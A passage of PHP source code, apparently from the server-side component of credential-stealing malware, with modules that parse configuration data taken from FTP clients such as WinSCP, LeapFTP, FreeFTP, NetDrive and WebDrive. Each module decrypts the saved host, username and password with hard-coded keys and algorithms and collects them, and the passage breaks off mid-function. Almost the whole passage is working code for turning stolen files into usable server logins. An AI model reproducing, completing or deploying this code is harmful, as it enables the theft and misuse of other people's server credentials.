3943. // -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
3944. // Fling 2.23 (based on ClassicFTP)
3945.  
3946. class module_fling extends module_classicftp_base
3947. {
3948.  
3949. }
3950.  
3951. // -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
3952. // SoftX 3.3
3953.  
3954. class module_softx extends module
3955. {
3956. private function decrypt_pass($encrypted_password)
3957. {
3958. for ($i = 0; $i < strlen($encrypted_password); $i++)
3959. $encrypted_password[$i] = chr(ord($encrypted_password[$i]) ^ 0x91);
3960.  
3961. return $encrypted_password;
3962. }
3963.  
3964. private function grab_config_string(&$config_data)
3965. {
3966. $value = substr($config_data, 0, 192);
3967.  
3968. if (strlen($value) < 192)
3969. return false;
3970.  
3971. $result = unicode_to_ansi($value);
3972. $config_data = substr($config_data, 192);
3973.  
3974. return $result;
3975. }
3976.  
3977. private function process_config($config_data)
3978. {
3979. if (strlen($config_data) == 0)
3980. return;
3981.  
3982. $label = $this->grab_config_string($config_data);
3983. if ($label === false)
3984. return;
3985.  
3986. $host = $this->grab_config_string($config_data);
3987. if ($host === false)
3988. return;
3989.  
3990. $port_value = substr($config_data, 0, 4);
3991. $config_data = substr($config_data, 8);
3992.  
3993. if (!strlen($config_data))
3994. return;
3995.  
3996. $port = data_int32($port_value);
3997.  
3998. $user = $this->grab_config_string($config_data);
3999. if ($user === false)
4000. return;
4001.  
4002. $pass = $this->grab_config_string($config_data);
4003. if ($pass === false)
4004. return;
4005.  
4006. $config_data = substr($config_data, 192 + 24);
4007. $dir = $this->grab_config_string($config_data);
4008.  
4009. $this->add_ftp(append_port_dir($host, $port, $dir), $user, $pass);
4010. }
4011.  
4012. public function import_item($stream, $id)
4013. {
4014. switch ($id)
4015. {
4016. case 0x0000:
4017. $encoded_data = $this->decrypt_pass($stream->read_str());
4018. $this->process_config($encoded_data);
4019. break;
4020. default:
4021. $this->log->add("ERR_UNKNOWN_ITEM_TYPE");
4022. return false;
4023. }
4024. return true;
4025. }
4026. }
4027.  
4028. // -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
4029. // Directory Opus 9.5.6.0.3937 (64-bit tested)
4030.  
4031. class module_dopus extends module
4032. {
4033. protected function strip_bad_xml_tags($xml_data)
4034. {
4035. // strip erroneus XML tags
4036. while (($i = strpos($xml_data, '<soundevents ')) !== false)
4037. {
4038. $j = strpos($xml_data, '>', $i+1);
4039. if ($j === false)
4040. break;
4041. $xml_data = substr($xml_data, 0, $i).substr($xml_data, $j+1);
4042. }
4043.  
4044. while (($i = strpos($xml_data, '<3>')) !== false)
4045. {
4046. $j = strpos($xml_data, '</3>', $i+1);
4047. if ($j === false)
4048. break;
4049. $xml_data = substr($xml_data, 0, $i).substr($xml_data, $j+1);
4050. }
4051.  
4052. return $xml_data;
4053. }
4054.  
4055. private function decrypt($encrypted_password)
4056. {
4057. if (strlen($encrypted_password) == 0 || substr($encrypted_password, 0, 2) != '@!')
4058. return '';
4059. $encrypted_password = substr($encrypted_password, 2);
4060.  
4061. $decoded_password = base64_decode($encrypted_password, true);
4062.  
4063. for ($i = 0; $i < strlen($decoded_password); $i++)
4064. {
4065. $decoded_password[$i] = chr(ord($decoded_password[$i]) ^ ($i + 3));
4066. }
4067. return $decoded_password;
4068. }
4069.  
4070. private function find_xml_dir($xml_array, &$resulting_dir)
4071. {
4072. $dir = assign($xml_array['dir']);
4073.  
4074. if (is_string($dir) && strlen($dir))
4075. $resulting_dir = Utf8ToWin($dir);
4076.  
4077. foreach ($xml_array as $value)
4078. {
4079. if (is_array($value))
4080. $this->find_xml_dir($value, $resulting_dir);
4081. }
4082. }
4083.  
4084. private function read_xml_item($xml_array, $dir, $protocol)
4085. {
4086. $host = assign($xml_array['host']);
4087.  
4088. $user = assign($xml_array['user']);
4089. $pass = assign($xml_array['pass']);
4090. $pass = $this->decrypt($pass);
4091. $port = assign($xml_array['port']);
4092.  
4093. $host = Utf8ToWin($host);
4094. $user = Utf8ToWin($user);
4095.  
4096. $this->add_ftp(append_port_dir(ftp_force_ssh($host, $protocol == '3'), $port, $dir), $user, $pass);
4097.  
4098. foreach ($xml_array as $value)
4099. {
4100. if (is_array($value))
4101. $this->read_xml_item($value, $dir, $protocol);
4102. }
4103. }
4104.  
4105. private function rec_scan_xml_array($xml_array)
4106. {
4107. foreach ($xml_array as $key=>$value)
4108. {
4109. if (is_array($value))
4110. {
4111. if (strval($key) == 'left')
4112. {
4113. $ecrypted_ftp_uri = assign($value['ftp']);
4114. $decrypted_ftp_uri = $this->decrypt($ecrypted_ftp_uri);
4115. if (strlen($decrypted_ftp_uri))
4116. {
4117. $this->add_ftp(urldecode($decrypted_ftp_uri));
4118. }
4119. } else if ((strval($key) == 'site'))
4120. {
4121. $dir = '';
4122. $protocol = '';
4123. if (isset($value['attributes']))
4124. $protocol = assign($value['attributes']['type']);
4125. $this->find_xml_dir($value, $dir);
4126. $this->read_xml_item($value, $dir, $protocol);
4127. } else if ((strval($key) == 'host'))
4128. {
4129. if (isset($value['attributes']) && is_array($value['attributes']))
4130. {
4131. $host = assign($value['attributes']['host']);
4132. $user = assign($value['attributes']['user']);
4133. $pass = assign($value['attributes']['pass']);
4134. $pass = $this->decrypt($pass);
4135. $port = assign($value['attributes']['port']);
4136. $this->add_ftp(append_port($host, $port), $user, $pass);
4137. }
4138. }
4139. $this->rec_scan_xml_array($value);
4140. }
4141. }
4142. }
4143.  
4144. protected function process_oxc($xml_data)
4145. {
4146. if (strlen($xml_data) == 0)
4147. return;
4148.  
4149. $xml_data = $this->strip_bad_xml_tags($xml_data);
4150.  
4151. $xml_parser = new XMLParser($xml_data);
4152. $parsed_xml = $xml_parser->parse();
4153. if (!$xml_parser->isError || is_array($parsed_xml))
4154. {
4155. $this->rec_scan_xml_array($parsed_xml);
4156. } else
4157. {
4158. $this->log->add("ERR_XML_PARSE");
4159. }
4160. }
4161.  
4162. protected function process_oll($xml_data)
4163. {
4164. $this->process_oxc($xml_data);
4165. }
4166.  
4167. protected function process_osd($xml_data)
4168. {
4169. $this->process_oxc($xml_data);
4170. }
4171.  
4172. public function import_item($stream, $id)
4173. {
4174. switch ($id)
4175. {
4176. case 0x0000:
4177. // oxc
4178. $this->process_oxc($stream->read_str());
4179. break;
4180. case 0x0001:
4181. // oll
4182. $this->process_oll($stream->read_str());
4183. break;
4184. case 0x0002:
4185. // ftplast.osd
4186. $this->process_osd($stream->read_str());
4187. break;
4188. default:
4189. $this->log->add("ERR_UNKNOWN_ITEM_TYPE");
4190. return false;
4191. }
4192. return true;
4193. }
4194. }
4195.  
4196. // -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
4197. // CoffeeCup FreeFTP 4.3 / DirectFTP
4198.  
4199. class module_freeftp extends module
4200. {
4201. private function GenKey($magic)
4202. {
4203. $result = '';
4204. for ($i = 0; $i < 56; $i++)
4205. {
4206. $magic = hexdec(gmp_strval(gmp_and(gmp_add(gmp_mul("$magic", "0x343FD"), "0x269EC3"), "0xffffffff"), 16));
4207. $result .= chr(((($magic >> 16) & 0x7fff) % 0x5d) + 0x21);
4208. }
4209. return $result;
4210. }
4211.  
4212. protected function decrypt($encrypted_password, $decryption_key)
4213. {
4214. $encrypted_password = base64_decode($encrypted_password, true);
4215. if (strlen($encrypted_password) == 0)
4216. return '';
4217.  
4218. $descriptor = mcrypt_module_open(MCRYPT_BLOWFISH, '', 'ecb', '');
4219.  
4220. if (!$descriptor)
4221. {
4222. $this->log->add("ERR_CANNOT_INITIALIZE_MCRYPT_MODULE");
4223. return '';
4224. }
4225.  
4226. $iv = "\0\0\0\0\0\0\0\0";
4227. mcrypt_generic_init($descriptor, $decryption_key, $iv);
4228.  
4229. $plain_text = decrypt_cfbblock($descriptor, $encrypted_password, $iv);
4230.  
4231. mcrypt_generic_deinit($descriptor);
4232. mcrypt_module_close($descriptor);
4233.  
4234. $decrypted_password = '';
4235. if (strlen($plain_text))
4236. {
4237. $char = $plain_text[strlen($plain_text)-1];
4238. while (strlen($plain_text) && ($plain_text[strlen($plain_text)-1] == $char))
4239. $plain_text = substr($plain_text, 0, -1);
4240. $decrypted_password = $plain_text;
4241. }
4242. return $decrypted_password;
4243. }
4244.  
4245. protected function process_sqlite_file($file_contents)
4246. {
4247. if (strlen($file_contents) == 0)
4248. return;
4249.  
4250. global $global_temporary_directory;
4251.  
4252. if (!class_exists('SQLite3') && !class_exists('PDO'))
4253. {
4254. $this->log->add("NOTIFY_PDO_AND_SQLITE3_CLASSES_DO_NOT_EXIST");
4255. return;
4256. }
4257.  
4258. $tmp_name = tempnam($global_temporary_directory, 'sqlite');
4259.  
4260. if (!is_writable($global_temporary_directory))
4261. {
4262. $this->log->add("ERR_CANNOT_ACCESS_SQLITE_DB_FILE");
4263. return;
4264. }
4265.  
4266. $fp = fopen($tmp_name, "wb");
4267. if (!$fp)
4268. {
4269. $this->log->add("ERR_CANNOT_ACCESS_SQLITE_DB_FILE");
4270. return;
4271. }
4272.  
4273. if (fwrite($fp, $file_contents) != strlen($file_contents))
4274. {
4275. fclose($fp);
4276. unlink($tmp_name);
4277. $this->log->add("ERR_CANNOT_WRITE_SQLITE_DB_FILE");
4278. return;
4279. }
4280.  
4281. fclose($fp);
4282.  
4283. if (class_exists('SQLite3'))
4284. {
4285. // use SQLite3 php-extension
4286. try
4287. {
4288. $database = new SQLite3($tmp_name, SQLITE3_OPEN_READONLY);
4289. if (!$database)
4290. {
4291. $this->log->add("ERR_CANNOT_OPEN_SQLITE_DB");
4292. } else
4293. {
4294. $global_value = '';
4295. $decryption_key = '';
4296.  
4297. $results = $database->query('SELECT GlobalValue FROM "TGlobalSettings" WHERE GlobalName="MagicNumber"');
4298.  
4299. // get magic key sqlite value
4300. if ($results && ($row = $results->fetchArray()))
4301. $global_value = $row['GlobalValue'];
4302.  
4303. // generate decryption key
4304. if ($global_value)
4305. $decryption_key = $this->GenKey(intval($global_value));
4306.  
4307. // use decryption key to decrypt the password
4308. if ($decryption_key)
4309. {
4310. try
4311. {
4312. $results = $database->query('SELECT ServerName, Url, ServerUser, ServerPass, remoteDir, port, Protocol FROM "TServers"');
4313. if ($results)
4314. {
4315. while ($row = $results->fetchArray())
4316. {
4317. $host = assign($row['Url']);
4318.  
4319. $user = assign($row['ServerUser']);
4320. $user = $this->decrypt($user, $decryption_key);
4321. $pass = assign($row['ServerPass']);
4322. $pass = $this->decrypt($pass, $decryption_key);
4323. $port = assign($row['port']);
4324. $dir = assign($row['remoteDir']);
4325. $protocol = assign($row['Protocol']);
4326.  
4327. $host = Utf8ToWin($host);
4328. $user = Utf8ToWin($user);
4329. $pass = Utf8ToWin($pass);
4330. $dir = Utf8ToWin($dir);
4331.  
4332. $this->add_ftp(append_port_dir(ftp_force_ssh($host, $protocol == 1), $port, $dir), $user, $pass);
4333. }
4334. }
4335. }
4336. catch(Exception $e)
4337. {
4338. }
4339. }
4340.  
4341. $database->close();
4342. unset($database);
4343. }
4344. }
4345. catch (Exception $e)
4346. {
4347. if (isset($database))
4348. {
4349. @$database->close();
4350. unset($database);
4351. }
4352. $this->log->add("ERR_SQLITE_EXCEPTION: $e");
4353. }
4354. } else if (class_exists('PDO'))
4355. {
4356. // use PDO driver
4357. $drivers = PDO::getAvailableDrivers();
4358. $driver_available = array_search('sqlite', $drivers) !== false;
4359.  
4360. if ($driver_available)
4361. {
4362. try
4363. {
4364. /*** create the database file in /tmp ***/
4365. $dbh = new PDO("sqlite:$tmp_name");
4366.  
4367. if (!$dbh)
4368. $this->log->add("ERR_CANNOT_OPEN_PDO_SQLITE_DB");
4369. else
4370. {
4371. /*** set all errors to exceptions ***/
4372. $dbh->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
4373.  
4374. $global_value = '';
4375. $decryption_key = '';
4376.  
4377. $sql = 'SELECT GlobalValue FROM "TGlobalSettings" WHERE GlobalName="MagicNumber"';
4378.  
4379. // get magic key sqlite value
4380. foreach ($dbh->query($sql) as $row)
4381. $global_value = $row['GlobalValue'];
4382.  
4383. // generate decryption key
4384. if ($global_value)
4385. $decryption_key = $this->GenKey(intval($global_value));
4386.  
4387. // use decryption key to decrypt the password
4388. if ($decryption_key)
4389. {
4390. try
4391. {
4392. $sql = 'SELECT ServerName, Url, ServerUser, ServerPass, remoteDir, port, Protocol FROM "TServers"';
4393. foreach ($dbh->query($sql) as $row)
4394. {
4395. $host = assign($row['Url']);
4396.  
4397. $user = assign($row['ServerUser']);
4398. $user = $this->decrypt($user, $decryption_key);
4399. $pass = assign($row['ServerPass']);
4400. $pass = $this->decrypt($pass, $decryption_key);
4401. $port = assign($row['port']);
4402. $dir = assign($row['remoteDir']);
4403. $protocol = assign($row['Protocol']);
4404.  
4405. $host = Utf8ToWin($host);
4406. $user = Utf8ToWin($user);
4407. $pass = Utf8ToWin($pass);
4408. $dir = Utf8ToWin($dir);
4409.  
4410. $this->add_ftp(append_port_dir(ftp_force_ssh($host, $protocol == 1), $port, $dir), $user, $pass);
4411. }
4412. }
4413. catch(Exception $e)
4414. {
4415. }
4416. }
4417. unset($dbh);
4418. }
4419. }
4420. catch (Exception $e)
4421. {
4422. if (isset($dbh))
4423. {
4424. unset($dbh);
4425. }
4426. $this->log->add("ERR_PDO_EXCEPTION: $e");
4427. }
4428. }
4429. }
4430. unlink($tmp_name);
4431. }
4432.  
4433. public function import_item($stream, $id)
4434. {
4435. switch ($id)
4436. {
4437. case 0x0000:
4438. case 0x0001:
4439. $this->process_sqlite_file($stream->read_str());
4440. break;
4441. default:
4442. $this->log->add("ERR_UNKNOWN_ITEM_TYPE");
4443. return false;
4444. }
4445. return true;
4446. }
4447. }
4448.  
4449. // -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
4450. // LeapFTP 2.6.2.470, 3.1.0.50
4451.  
4452. class stream_leapftp extends stream
4453. {
4454. function read_bytestring()
4455. {
4456. if (!$this->state)
4457. return false;
4458. $len = $this->read_byte();
4459.  
4460. if ($len == 0xff)
4461.  
4462. return $this->read_strlen($this->read_word());
4463. else
4464. return $this->read_strlen($len);
4465. }
4466. }
4467.  
4468. class module_leapftp extends module
4469. {
4470. private function decrypt($encrypted_password)
4471. {
4472. $CXorArray = array(0xdb, 0x94, 0xec, 0xc0, 0xde, 0x44, 0x69, 0x9b);
4473. foreach ($CXorArray as $key=>$value)
4474. $CXorArray[$key] = $CXorArray[$key] ^ 0x30;
4475.  
4476. for ($i = 0; $i < strlen($encrypted_password); $i++)
4477. $encrypted_password[$i] = chr(ord($encrypted_password[$i]) ^ $CXorArray[$i % 8]);
4478.  
4479. if (strlen($encrypted_password) == 0)
4480. return '';
4481.  
4482. $encrypted_password = substr($encrypted_password, 0, -(8-ord($encrypted_password[strlen($encrypted_password)-1])));
4483. return ztrim($encrypted_password);
4484. }
4485.  
4486. private function decrypt_old($encrypted_password)
4487. {
4488. if (!strlen($encrypted_password))
4489. return '';
4490.  
4491. if ($encrypted_password[0] != chr(0x7f))
4492. return '';
4493.  
4494. $encrypted_password = substr($encrypted_password, 1);
4495. if (strlen($encrypted_password) % 2 != 0)
4496. return '';
4497.  
4498. $result = '';
4499.  
4500. for ($i = 0; $i < strlen($encrypted_password); $i += 2)
4501. {
4502. $result .= chr(ord($encrypted_password[$i])-0x15);
4503. }
4504.  
4505. return $result;
4506. }
4507.  
4508. private function read_ftp_item($file_stream)
4509. {
4510. if (!$file_stream->state)
4511. return false;
4512.  
4513. $file_stream->read_bytestring(); // sitename
4514. $port = $file_stream->read_word(); // port
4515. $host = $file_stream->read_bytestring(); // host
4516. $user = $file_stream->read_bytestring(); // user
4517. $pass = $this->decrypt($file_stream->read_bytestring()); // password
4518. $file_stream->read_bytestring(); // local path
4519. $dir = $file_stream->read_bytestring(); // remote directory
4520. $file_stream->read_bytestring(); // notes
4521. $file_stream->read_bytestring(); // retry count
4522. $file_stream->read_bytestring(); // retry delay
4523. $protocol = $file_stream->read_dword(); // protocol
4524.  
4525. $file_stream->read_skip(16*4+4);
4526.  
4527. $this->add_ftp(append_port_dir(ftp_force_ssh($host, $protocol == 3), $port, $dir), $user, $pass);
4528.  
4529. $continue = true;
4530. while ($continue && $file_stream->state)
4531. {
4532. $block_id = $file_stream->read_byte();
4533. if (!$file_stream->state)
4534. break;
4535. switch ($block_id)
4536. {
4537. case 100:
4538. case 101:
4539. case 105:
4540. $file_stream->read_bytestring();
4541. break;
4542. case 106:
4543. $file_stream->read_bytestring();
4544. break;
4545. case 102:
4546. $file_stream->read_bytestring();
4547. $file_stream->read_skip(1);
4548. break;
4549. case 107:
4550. $file_stream->read_bytestring();
4551. $file_stream->read_bytestring();
4552. break;
4553. case 0xff:
4554. // final block
4555. $continue = false;
4556. break;
4557. default:
4558. $this->log->add("ERR_UNEXPECTED_LEAPFTP_DATABLOCK");
4559. return false;
4560. }
4561. }
4562.  
4563. return $file_stream->state;
4564. }
4565.  
4566. protected function process_dat_file($file_contents)
4567. {
4568. if (strlen($file_contents) <= 4)
4569. return true;
4570.  
4571. $file_stream = new stream_leapftp($file_contents, $this->log);
4572.  
4573. $file_header = $file_stream->read_dword();
4574.  
4575. // check for master password protection
4576. if ($file_header == 0x54535f45)
4577. return true;
4578.  
4579. // verify file header
4580. if ($file_header != 0x017a69)
4581. {
4582. $this->log->add("ERR_INVALID_LEAPFTP_DAT_VERSION");
4583. return false;
4584. }
4585.  
4586. while (!$file_stream->eof() && $file_stream->state)
4587. {
4588. $is_folder = $file_stream->read_byte();
4589. if (!$file_stream->state)
4590. break;
4591. if ($is_folder == 0)
4592. {
4593. $file_stream->read_skip(2);
4594. $file_stream->read_bytestring(); // folder name
4595. } else if ($is_folder == 1)
4596. {
4597. $file_stream->read_skip(1);
4598. if (!$this->read_ftp_item($file_stream))
4599. break;
4600. } else
4601. {
4602. $this->log->add("ERR_UNEXPECTED_LEAPFTP_DATA");
4603. return false;
4604. }
4605. }
4606.  
4607. return ($file_stream->state) && ($file_stream->eof());
4608. }
4609.  
4610. protected function process_ini_file($file_contents)
4611. {
4612. if (strlen($file_contents) <= 4)
4613. return;
4614.  
4615. $parsed_ini = parse_ini($file_contents);
4616.  
4617. foreach ($parsed_ini as $section)
4618. {
4619. if (!is_array($section))
4620. continue;
4621. $host = assign($section["ip"]);
4622. $user = assign($section["user"]);
4623. $pass = $this->decrypt_old(assign($section["pass"]));
4624. $dir = assign($section["remotedir"]);
4625. $port = assign($section["port"]);
4626. $this->add_ftp(append_port_dir($host, $port, $dir), $user, $pass);
4627. }
4628. }
4629.  
4630. public function import_item($stream, $id)
4631. {
4632. switch ($id)
4633. {
4634. case 0x0000:
4635. $this->process_dat_file($stream->read_str());
4636. break;
4637. case 0x0001:
4638. $this->process_ini_file($stream->read_str());
4639. break;
4640. default:
4641. $this->log->add("ERR_UNKNOWN_ITEM_TYPE");
4642. return false;
4643. }
4644. return true;
4645. }
4646. }
4647.  
4648. // -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
4649. // WinSCP 4.3.2 (Build 1201)
4650.  
4651. class module_winscp extends module
4652. {
4653. private function decrypt($host, $user, $encrypted_password)
4654. {
4655. if (!strlen($encrypted_password))
4656. return '';
4657.  
4658. $encrypted_password = hextostr($encrypted_password);
4659.  
4660. if ($encrypted_password === false)
4661. {
4662. $this->log->add("ERR_CANNOT_DECRYPT_PASSWORD");
4663. return '';
4664. }
4665.  
4666. for ($i = 0; $i < strlen($encrypted_password); $i++)
4667. $encrypted_password[$i] = chr(ord($encrypted_password[$i]) ^ 92);
4668.  
4669. $blen = ord($encrypted_password[2]);
4670. $bskip = ord($encrypted_password[3]);
4671.  
4672. $encrypted_password = substr($encrypted_password, 4);
4673. $encrypted_password = substr($encrypted_password, $bskip);
4674. $plain_password = substr($encrypted_password, 0, $blen);
4675.  
4676. $blen = strlen($host) + strlen($user);
4677. if (substr($plain_password, 0, $blen) == $user.$host)
4678. return substr($plain_password, $blen);
4679. else
4680. $this->log->add("ERR_CANNOT_DECRYPT_PASSWORD");
4681. return '';
4682. }
4683.  
4684. public function import_item($stream, $id)
4685. {
4686. switch ($id)
4687. {
4688. case 0x0000:
4689. case 0x0010:
4690. $host = $stream->read_str();
4691. $user = $stream->read_str();
4692. $pass = $this->decrypt($host, $user, $stream->read_str());
4693. $port = $stream->read_dword();
4694. $dir = $stream->read_str();
4695.  
4696. $proto = 0;
4697.  
4698. if (($id & 0x10) > 0)
4699. {
4700. // 5: FTP
4701. // 2: clean SFTP
4702. // empty (0): SFTP with SCP callback (default)
4703. $proto = $stream->read_dword();
4704. }
4705.  
4706. $this->add_ftp(append_port_dir(ftp_force_ssh($host, $proto != 5), $port, $dir), $user, $pass);
4707.  
4708. break;
4709. default:
4710. $this->log->add("ERR_UNKNOWN_ITEM_TYPE");
4711. return false;
4712. }
4713. return true;
4714. }
4715. }
4716.  
4717. // -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
4718. // 32bit FTP 2.6.1
4719.  
4720. class module_32bitftp extends module
4721. {
4722. private function decrypt($encrypted_password)
4723. {
4724. if (!strlen($encrypted_password))
4725. return '';
4726.  
4727. $decoded_password = hextostr($encrypted_password);
4728. if ($decoded_password === false)
4729. {
4730. $this->log->add('ERR_INVALID_HEX_STRING');
4731. }
4732.  
4733. for ($i = 0; $i < strlen($decoded_password); $i++)
4734. $decoded_password[$i] = chr(ord($decoded_password[$i]) - $i);
4735.  
4736. return $decoded_password;
4737. }
4738.  
4739. protected function process_ini_file($file_contents)
4740. {
4741. if (!trim($file_contents))
4742. return;
4743.  
4744. $parsed_ini = parse_ini($file_contents);
4745. foreach ($parsed_ini as $section)
4746. {
4747. if (!is_array($section))
4748. continue;
4749. $host = assign($section["hostaddress"]);
4750. $user = assign($section["hostusername"]);
4751. $pass = $this->decrypt(assign($section["hostpassword"]));
4752. $dir = assign($section["remotesitedirlast"]);
4753. $port = assign($section["hostport"]);
4754.  
4755. $this->add_ftp(append_port_dir($host, $port, $dir), $user, $pass);
4756. }
4757. }
4758.  
4759. public function import_item($stream, $id)
4760. {
4761. switch ($id)
4762. {
4763. case 0x0000:
4764. $this->process_ini_file($stream->read_str());
4765. break;
4766. default:
4767. $this->log->add("ERR_UNKNOWN_ITEM_TYPE");
4768. return false;
4769. }
4770. return true;
4771. }
4772. }
4773.  
4774. // -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
4775. // NetDrive 1.2.0.4
4776.  
4777. class module_netdrive extends module
4778. {
4779. private function decrypt($encrypted_password)
4780. {
4781. if (!strlen($encrypted_password))
4782. return '';
4783.  
4784. $encrypted_password = hextostr($encrypted_password);
4785. if ($encrypted_password === false)
4786. {
4787. $this->log->add('ERR_INVALID_HEX_STRING');
4788. return '';
4789. }
4790.  
4791. $cipher_key = 'klfhuw%$#%fgjlvf'.chr(0);
4792. $iv = "\0\0\0\0\0\0\0\0";
4793. $plain_text = mcrypt_decrypt(MCRYPT_3DES, $cipher_key, $encrypted_password, MCRYPT_MODE_ECB, $iv);
4794. if (!strlen($plain_text))
4795. {
4796. $this->log->add('ERR_CANNOT_DECRYPT_PASSWORD');
4797. }
4798.  
4799. return trim($plain_text);
4800. }
4801.  
4802. protected function read_xml_item($xml_array)
4803. {
4804. $host = assign($xml_array['Address']);
4805. $user = assign($xml_array['User']);
4806. $user = $this->decrypt($user);
4807. $pass = assign($xml_array['Pass']);
4808. $pass = $this->decrypt($pass);
4809. $port = assign($xml_array['Port']);
4810. $protocol = assign($xml_array['SSL']);
4811.  
4812. $this->add_ftp(append_port(ftp_force_ssh($host, $protocol == '5'), $port), $user, $pass);
4813.  
4814. foreach ($xml_array as $value)
4815. {
4816. if (is_array($value))
4817. $this->read_xml_item($value);
4818. }
4819. }
4820.  
4821. protected function rec_scan_xml_array($xml_array)
4822. {
4823. foreach ($xml_array as $key=>$value)
4824. {
4825. if (is_array($value))
4826. {
4827. if (strval($key) == 'Site')
4828. $this->read_xml_item($value);
4829. $this->rec_scan_xml_array($value);
4830. }
4831. }
4832. }
4833.  
4834. protected function process_xml($value)
4835. {
4836. if (strlen($value) == 0)
4837. return;
4838.  
4839. $xml_parser = new XMLParser($value);
4840. $parsed_xml = $xml_parser->parse();
4841. if (!$xml_parser->isError || is_array($parsed_xml))
4842. {
4843. $this->rec_scan_xml_array($parsed_xml);
4844. } else
4845. {
4846. $this->log->add("ERR_XML_PARSE");
4847. }
4848. }
4849.  
4850. public function import_item($stream, $id)
4851. {
4852. switch ($id)
4853. {
4854. case 0x0000:
4855. $this->process_xml($stream->read_str());
4856. break;
4857. default:
4858. $this->log->add("ERR_UNKNOWN_ITEM_TYPE");
4859. return false;
4860. }
4861. return true;
4862. }
4863. }
4864.  
4865. // -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
4866. // FTP Control 4.5.0.0
4867.  
4868. class module_ftpcontrol extends module
4869. {
4870. private function decrypt($encrypted_password)
4871. {
4872. if (strlen($encrypted_password) == 0)
4873. return '';
4874.  
4875. $decoded_password = hextostr($encrypted_password);
4876.  
4877. if ($decoded_password === false)
4878. {
4879. $this->log->add("ERR_CANNOT_DECRYPT_PASSWORD");
4880. }
4881.  
4882. $key = 0x2396;
4883. for ($i = 0; $i < strlen($decoded_password); $i++)
4884. {
4885. $old = $decoded_password[$i];
4886. $decoded_password[$i] = chr(ord($decoded_password[$i]) ^ (($key >> 8) & 0xff));
4887. $key = hexdec(gmp_strval(gmp_and(gmp_add(gmp_mul(gmp_add("$key", strval(ord($old))), "0xCE6D"), "0x58BF"), "0xffffffff"), 16));
4888. }
4889.  
4890. return $decoded_password;
4891. }
4892.  
4893. protected function process_ini_file($file_contents)
4894. {
4895. if (strlen(trim($file_contents)) == 0)
4896. return;
4897.  
4898. $parsed_ini = parse_ini($file_contents);
4899. foreach ($parsed_ini as $section)
4900. {
4901. if (!is_array($section))
4902. continue;
4903. $host = assign($section["host"]);
4904. $user = assign($section["username"]);
4905. $pass = $this->decrypt(assign($section["password"]));
4906. $dir = assign($section["defaultdirectory"]);
4907. $port = assign($section["port"]);
4908.  
4909. $this->add_ftp(append_port_dir($host, $port, $dir), $user, $pass);
4910. }
4911. }
4912.  
4913. public function import_item($stream, $id)
4914. {
4915. switch ($id)
4916. {
4917. case 0x0000:
4918. $this->process_ini_file($stream->read_str());
4919. break;
4920. default:
4921. $this->log->add("ERR_UNKNOWN_ITEM_TYPE");
4922. return false;
4923. }
4924. return true;
4925. }
4926. }
4927.  
4928. // -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
4929. // WebDrive 9.16 (Build 2385) 64-bit tested
4930.  
4931. class module_webdrive extends module
4932. {
4933. private $CWebDriveKey = "\xDA\xF2\xE6\xE8\xD2\xC6\xBE\xE4\xD0\xF2\xE8\xD0\xDA\xE6";
4934.  
4935. private function gen_check_key($salt)
4936. {
4937. return substr(sha1(substr($this->CWebDriveKey, 0, 14).substr($salt, 0, 8), true), 0, 8);
4938. }
4939.  
4940. private function gen_key_iv($salt, &$key_out, &$iv_out)
4941. {
4942. $mash_key = $this->CWebDriveKey.substr($salt, 0, 8);
4943. $out_buf = '';
4944.  
4945. $i = 0;
4946. while ($i < 24)
4947. {
4948. $out_buf .= sha1(chr($i >> 8).chr($i).$mash_key, true);
4949. $i += 20;
4950. }
4951.  
4952. for ($k = 0; $k < 199; $k++)
4953. {
4954. $buf = $out_buf;
4955. $out_buf = '';
4956. $i = 0;
4957. while ($i < 24)
4958. {
4959. $out_buf .= sha1(chr($i >> 8).chr($i).$buf, true);
4960. $i += 20;
4961. }
4962. }
4963.  
4964. $key_out = substr($out_buf, 0, 16);
4965. $iv_out = substr($out_buf, 16, 8);
4966. }
4967.  
4968. private function decrypt($encrypted_password)
4969. {
4970. if (strlen($encrypted_password) < 3+16*2)
4971. return '';
4972.  
4973. $encrypted_password = substr($encrypted_password, 1);
4974.  
4975. // check password length
4976. $pass_len = (ord($encrypted_password[1]) << 8) | (ord($encrypted_password[0]));
